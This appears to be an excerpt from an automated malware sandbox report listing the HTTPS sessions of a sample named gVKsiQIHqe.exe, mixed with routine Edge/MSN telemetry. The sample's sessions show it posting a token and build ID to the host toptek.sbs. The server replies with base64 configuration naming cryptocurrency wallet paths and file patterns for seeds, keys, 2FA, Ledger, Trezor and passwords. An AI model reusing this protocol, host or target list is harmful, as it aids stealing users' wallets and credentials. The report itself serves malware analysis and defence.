                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:07 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:07 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                                                                                                                    Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    39192.168.2.54992894.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:09 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----6XLN7YM7GVAIM7GDJ5XT
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:09 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 36 58 4c 4e 37 59 4d 37 47 56 41 49 4d 37 47 44 4a 35 58 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 36 58 4c 4e 37 59 4d 37 47 56 41 49 4d 37 47 44 4a 35 58 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 36 58 4c 4e 37 59 4d 37 47 56 41 49 4d 37 47 44 4a 35 58 54 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------6XLN7YM7GVAIM7GDJ5XTContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------6XLN7YM7GVAIM7GDJ5XTContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------6XLN7YM7GVAIM7GDJ5XTCont
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:09 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:09 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:09 UTC2364INData Raw: 39 33 30 0d 0a 52 45 56 54 53 31 52 50 55 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e
                                                                                                                                                                                                                                                                                    Data Ascii: 930REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    40192.168.2.54993120.189.173.144437432C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:09 UTC1071OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734933487728&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 11956
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                    Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                    Cookie: USRLOC=; MUID=1527A764E6A86BDB2DE6B23AE7AF6A4B; _EDGE_S=F=1&SID=274477A862C669B72E1F62F6631E6834; _EDGE_V=1; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:09 UTC11956OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 33 54 30 35 3a 35 38 3a 30 37 2e 37 32 36 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 32 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 34 34 64 64 61 65 36 31 2d 61 37 34 64 2d 34 37 63 39 2d 39 32 30 35 2d 35 62 35 62 30 30 30 35 33 31 38 64 22 2c 22 65 70 6f 63 68 22 3a 22 31 34 30 31 30 31 36 31 36 36 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                                    Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-23T05:58:07.726Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"44ddae61-a74d-47c9-9205-5b5b0005318d","epoch":"1401016166"},"app":{"locale
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:10 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                    P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                    Set-Cookie: MC1=GUID=76796d8d11be4c8d82f3302171e522ed&HASH=7679&LV=202412&V=4&LU=1734933490098; Domain=.microsoft.com; Expires=Tue, 23 Dec 2025 05:58:10 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                    Set-Cookie: MS0=5455e467c18544418d35ddfcee59a072; Domain=.microsoft.com; Expires=Mon, 23 Dec 2024 06:28:10 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                    time-delta-millis: 2370
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                    Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:10 GMT
                                                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    41192.168.2.54993020.189.173.144437432C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:10 UTC1070OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734933487734&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 5220
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                    Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                    Cookie: USRLOC=; MUID=1527A764E6A86BDB2DE6B23AE7AF6A4B; _EDGE_S=F=1&SID=274477A862C669B72E1F62F6631E6834; _EDGE_V=1; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:10 UTC5220OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 33 54 30 35 3a 35 38 3a 30 37 2e 37 33 33 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 33 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 34 34 64 64 61 65 36 31 2d 61 37 34 64 2d 34 37 63 39 2d 39 32 30 35 2d 35 62 35 62 30 30 30 35 33 31 38 64 22 2c 22 65 70 6f 63 68 22 3a 22 31 34 30 31 30 31 36 31 36 36 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                                    Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-23T05:58:07.733Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"44ddae61-a74d-47c9-9205-5b5b0005318d","epoch":"1401016166"},"app":{"locale
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:10 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                    P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                    Set-Cookie: MC1=GUID=6a1a3875acf742489afe6c12c1f6249d&HASH=6a1a&LV=202412&V=4&LU=1734933490266; Domain=.microsoft.com; Expires=Tue, 23 Dec 2025 05:58:10 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                    Set-Cookie: MS0=78728c77ed8a48b4a3093e8489e6fe5b; Domain=.microsoft.com; Expires=Mon, 23 Dec 2024 06:28:10 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                    time-delta-millis: 2532
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                    Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:10 GMT
                                                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    42192.168.2.54993320.189.173.144437432C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:10 UTC1060OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734933488576&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 5418
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                    Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                    Cookie: USRLOC=; MUID=1527A764E6A86BDB2DE6B23AE7AF6A4B; _EDGE_S=F=1&SID=274477A862C669B72E1F62F6631E6834; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:10 UTC5418OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 33 54 30 35 3a 35 38 3a 30 38 2e 35 37 34 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 34 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 34 34 64 64 61 65 36 31 2d 61 37 34 64 2d 34 37 63 39 2d 39 32 30 35 2d 35 62 35 62 30 30 30 35 33 31 38 64 22 2c 22 65 70 6f 63 68 22 3a 22 31 34 30 31 30 31 36 31 36 36 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                                    Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-23T05:58:08.574Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"44ddae61-a74d-47c9-9205-5b5b0005318d","epoch":"1401016166"},"app":{"locale
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:11 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                    P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                    Set-Cookie: MC1=GUID=e1601fd9272c442b832338798920974d&HASH=e160&LV=202412&V=4&LU=1734933490952; Domain=.microsoft.com; Expires=Tue, 23 Dec 2025 05:58:10 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                    Set-Cookie: MS0=929ffc093ef9460e8e1a07aeed78e217; Domain=.microsoft.com; Expires=Mon, 23 Dec 2024 06:28:10 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                    time-delta-millis: 2376
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                    Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:11 GMT
                                                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    43192.168.2.54993820.189.173.144437432C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:10 UTC1060OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734933488735&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 9877
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                    Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                    Cookie: USRLOC=; MUID=1527A764E6A86BDB2DE6B23AE7AF6A4B; _EDGE_S=F=1&SID=274477A862C669B72E1F62F6631E6834; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:10 UTC9877OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 33 54 30 35 3a 35 38 3a 30 38 2e 37 33 34 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 35 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 34 34 64 64 61 65 36 31 2d 61 37 34 64 2d 34 37 63 39 2d 39 32 30 35 2d 35 62 35 62 30 30 30 35 33 31 38 64 22 2c 22 65 70 6f 63 68 22 3a 22 31 34 30 31 30 31 36 31 36 36 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63
                                                                                                                                                                                                                                                                                    Data Ascii: {"name":"MS.News.Web.ContentView","time":"2024-12-23T05:58:08.734Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"44ddae61-a74d-47c9-9205-5b5b0005318d","epoch":"1401016166"},"app":{"loc
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:11 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                    P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                    Set-Cookie: MC1=GUID=2a7b1dd5dc2447f59a630ef65f8d1f37&HASH=2a7b&LV=202412&V=4&LU=1734933491152; Domain=.microsoft.com; Expires=Tue, 23 Dec 2025 05:58:11 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                    Set-Cookie: MS0=4cbf64bd0a6742d89acfdf9810d4be1a; Domain=.microsoft.com; Expires=Mon, 23 Dec 2024 06:28:11 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                    time-delta-millis: 2417
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                    Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:11 GMT
                                                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    44192.168.2.54993994.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:11 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----WT0R1DJWBSJM7YUKX47G
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1841
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
